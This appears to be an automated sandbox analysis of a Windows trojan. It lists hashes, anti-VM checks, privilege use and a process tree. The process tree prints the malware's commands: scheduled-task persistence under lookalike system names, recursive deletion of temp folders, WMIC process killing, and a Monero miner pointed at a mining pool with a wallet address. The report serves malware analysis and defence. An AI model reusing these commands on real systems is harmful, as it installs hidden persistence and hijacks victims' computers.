Analysis
-
max time kernel
72s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
21/03/2022, 20:22
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
Resource
win7-20220311-en
General
-
Target
SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
-
Size
7.7MB
-
MD5
7bf3a72a5287c6388cda810822c894a3
-
SHA1
4c23e414457d18ceee367a19afbe0c51588c3df0
-
SHA256
7ae4237b70f7233f779dbcde9db944e13472a1c4097baa4a17f5e769e0869476
-
SHA512
014fa7d7ead618cdbead06ec8658b7c41baba40d1954358065b28f0eab824028a4b34263d187ed332a0e40b5e6bba64b027bf6cfadf638b0924ae96aba00d9c9
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 5 IoCs
pid Process 1460 Win32WebViewHost.exe 4720 WmіPrvSE.exe 3452 RuntіmeBroker.exe 3708 dismhost.exe 400 HxTsr.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WmіPrvSE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WmіPrvSE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HxTsr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion HxTsr.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Win32WebViewHost.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation RuntіmeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WmіPrvSE.exe -
Loads dropped DLL 9 IoCs
pid Process 3708 dismhost.exe 3708 dismhost.exe 3708 dismhost.exe 3708 dismhost.exe 400 HxTsr.exe 400 HxTsr.exe 400 HxTsr.exe 400 HxTsr.exe 400 HxTsr.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WmіPrvSE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HxTsr.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\system32\vcruntime140_1.dll WmіPrvSE.exe File opened for modification C:\Windows\System32\LOG HxTsr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\setuperr.log cleanmgr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\diagerr.xml cleanmgr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\diagwrn.xml cleanmgr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\setupact.log cleanmgr.exe File opened for modification C:\Windows\system32\msvcp140.dll WmіPrvSE.exe File opened for modification C:\Windows\system32\vcruntime140.dll WmіPrvSE.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log cleanmgr.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 cleanmgr.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2496 schtasks.exe 2660 schtasks.exe -
Kills process with WMI 2 IoCs
pid Process 1656 WMIC.exe 1396 WMIC.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 2164 PING.EXE 1460 PING.EXE 4088 PING.EXE 4032 PING.EXE 2300 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe 1460 Win32WebViewHost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1460 Win32WebViewHost.exe Token: SeDebugPrivilege 3452 RuntіmeBroker.exe Token: SeDebugPrivilege 4720 WmіPrvSE.exe Token: SeIncreaseQuotaPrivilege 3492 WMIC.exe Token: SeSecurityPrivilege 3492 WMIC.exe Token: SeTakeOwnershipPrivilege 3492 WMIC.exe Token: SeLoadDriverPrivilege 3492 WMIC.exe Token: SeSystemProfilePrivilege 3492 WMIC.exe Token: SeSystemtimePrivilege 3492 WMIC.exe Token: SeProfSingleProcessPrivilege 3492 WMIC.exe Token: SeIncBasePriorityPrivilege 3492 WMIC.exe Token: SeCreatePagefilePrivilege 3492 WMIC.exe Token: SeBackupPrivilege 3492 WMIC.exe Token: SeRestorePrivilege 3492 WMIC.exe Token: SeShutdownPrivilege 3492 WMIC.exe Token: SeDebugPrivilege 3492 WMIC.exe Token: SeSystemEnvironmentPrivilege 3492 WMIC.exe Token: SeRemoteShutdownPrivilege 3492 WMIC.exe Token: SeUndockPrivilege 3492 WMIC.exe Token: SeManageVolumePrivilege 3492 WMIC.exe Token: 33 3492 WMIC.exe Token: 34 3492 WMIC.exe Token: 35 3492 WMIC.exe Token: 36 3492 WMIC.exe Token: SeIncreaseQuotaPrivilege 3492 WMIC.exe Token: SeSecurityPrivilege 3492 WMIC.exe Token: SeTakeOwnershipPrivilege 3492 WMIC.exe Token: SeLoadDriverPrivilege 3492 WMIC.exe Token: SeSystemProfilePrivilege 3492 WMIC.exe Token: SeSystemtimePrivilege 3492 WMIC.exe Token: SeProfSingleProcessPrivilege 3492 WMIC.exe Token: SeIncBasePriorityPrivilege 3492 WMIC.exe Token: SeCreatePagefilePrivilege 3492 WMIC.exe Token: SeBackupPrivilege 3492 WMIC.exe Token: SeRestorePrivilege 3492 WMIC.exe Token: SeShutdownPrivilege 3492 WMIC.exe Token: SeDebugPrivilege 3492 WMIC.exe Token: SeSystemEnvironmentPrivilege 3492 WMIC.exe Token: SeRemoteShutdownPrivilege 3492 WMIC.exe Token: SeUndockPrivilege 3492 WMIC.exe Token: SeManageVolumePrivilege 3492 WMIC.exe Token: 33 3492 WMIC.exe Token: 34 3492 WMIC.exe Token: 35 3492 WMIC.exe Token: 36 3492 WMIC.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeManageVolumePrivilege 208 cleanmgr.exe Token: SeIncreaseQuotaPrivilege 1656 WMIC.exe Token: SeSecurityPrivilege 1656 WMIC.exe Token: SeTakeOwnershipPrivilege 1656 WMIC.exe Token: SeLoadDriverPrivilege 1656 WMIC.exe Token: SeSystemProfilePrivilege 1656 WMIC.exe Token: SeSystemtimePrivilege 1656 WMIC.exe Token: SeProfSingleProcessPrivilege 1656 WMIC.exe Token: SeIncBasePriorityPrivilege 1656 WMIC.exe Token: SeCreatePagefilePrivilege 1656 WMIC.exe Token: SeBackupPrivilege 1656 WMIC.exe Token: SeRestorePrivilege 1656 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 400 HxTsr.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 1380 wrote to memory of 1460 1380 SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe 79 PID 1380 wrote to memory of 1460 1380 SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe 79 PID 1460 wrote to memory of 2496 1460 Win32WebViewHost.exe 81 PID 1460 wrote to memory of 2496 1460 Win32WebViewHost.exe 81 PID 1460 wrote to memory of 2660 1460 Win32WebViewHost.exe 83 PID 1460 wrote to memory of 2660 1460 Win32WebViewHost.exe 83 PID 1460 wrote to memory of 3128 1460 Win32WebViewHost.exe 86 PID 1460 wrote to memory of 3128 1460 Win32WebViewHost.exe 86 PID 1460 wrote to memory of 3304 1460 Win32WebViewHost.exe 85 PID 1460 wrote to memory of 3304 1460 Win32WebViewHost.exe 85 PID 3128 wrote to memory of 4088 3128 cmd.exe 89 PID 3128 wrote to memory of 4088 3128 cmd.exe 89 PID 3304 wrote to memory of 4032 3304 cmd.exe 90 PID 3304 wrote to memory of 4032 3304 cmd.exe 90 PID 3128 wrote to memory of 4016 3128 cmd.exe 91 PID 3128 wrote to memory of 4016 3128 cmd.exe 91 PID 3304 wrote to memory of 4592 3304 cmd.exe 92 PID 3304 wrote to memory of 4592 3304 cmd.exe 92 PID 3304 wrote to memory of 2300 3304 cmd.exe 93 PID 3304 wrote to memory of 2300 3304 cmd.exe 93 PID 3452 wrote to memory of 208 3452 RuntіmeBroker.exe 105 PID 3452 wrote to memory of 208 3452 RuntіmeBroker.exe 105 PID 208 wrote to memory of 3708 208 cleanmgr.exe 106 PID 208 wrote to memory of 3708 208 cleanmgr.exe 106 PID 4720 wrote to memory of 1408 4720 WmіPrvSE.exe 108 PID 4720 wrote to memory of 1408 4720 WmіPrvSE.exe 108 PID 4720 wrote to memory of 3468 4720 WmіPrvSE.exe 109 PID 4720 wrote to memory of 3468 4720 WmіPrvSE.exe 109 PID 4720 wrote to memory of 424 4720 WmіPrvSE.exe 110 PID 4720 wrote to memory of 424 4720 WmіPrvSE.exe 110 PID 424 wrote to memory of 2164 424 cmd.exe 114 PID 424 wrote to memory of 2164 424 cmd.exe 114 PID 3468 wrote to memory of 3492 3468 cmd.exe 115 PID 3468 wrote to memory of 3492 3468 cmd.exe 115 PID 4720 wrote to memory of 2360 4720 WmіPrvSE.exe 120 PID 4720 wrote to memory of 2360 4720 WmіPrvSE.exe 120 PID 4720 wrote to memory of 3964 4720 WmіPrvSE.exe 116 PID 4720 wrote to memory of 3964 4720 WmіPrvSE.exe 116 PID 4720 wrote to memory of 4040 4720 WmіPrvSE.exe 118 PID 4720 wrote to memory of 4040 4720 WmіPrvSE.exe 118 PID 2360 wrote to memory of 1656 2360 cmd.exe 122 PID 2360 wrote to memory of 1656 2360 cmd.exe 122 PID 4040 wrote to memory of 1460 4040 cmd.exe 123 PID 4040 wrote to memory of 1460 4040 cmd.exe 123 PID 1408 wrote to memory of 1396 1408 cmd.exe 124 PID 1408 wrote to memory of 1396 1408 cmd.exe 124 PID 3964 wrote to memory of 3032 3964 cmd.exe 125 PID 3964 wrote to memory of 3032 3964 cmd.exe 125 PID 4720 wrote to memory of 400 4720 WmіPrvSE.exe 126 PID 4720 wrote to memory of 400 4720 WmіPrvSE.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "WmіPrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe" /f3⤵
- Creates scheduled task(s)
PID:2496
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "RuntіmeBroker" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe" /f3⤵
- Creates scheduled task(s)
PID:2660
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q3⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\PING.EXEping -n 1 127.0.0.14⤵
- Runs ping.exe
PID:4032
-
-
C:\Windows\system32\xcopy.exexcopy /h /r /y /z /c /i "WmіPrvSE.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\"4⤵PID:4592
-
-
C:\Windows\system32\PING.EXEping -n 4 127.0.0.14⤵
- Runs ping.exe
PID:2300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\system32\PING.EXEping -n 1 127.0.0.14⤵
- Runs ping.exe
PID:4088
-
-
C:\Windows\system32\xcopy.exexcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"4⤵PID:4016
-
-
-
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exeC:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\cmd.exe"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\Wbem\WMIC.exewmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate3⤵
- Kills process with WMI
PID:1396
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete2⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\System32\Wbem\WMIC.exewmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%2⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
PID:2164
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete2⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\Wbem\WMIC.exewmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles2⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\PING.EXEping -n 10 127.0.0.13⤵
- Runs ping.exe
PID:1460
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate2⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\System32\Wbem\WMIC.exewmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe"C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 12⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of FindShellTrayWindow
PID:400
-
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exeC:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\System32\cleanmgr.exe"C:\Windows\System32\cleanmgr.exe" /setup2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exeC:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe {F243B500-D086-4018-A5D7-26A3B538A770}3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3708
-
-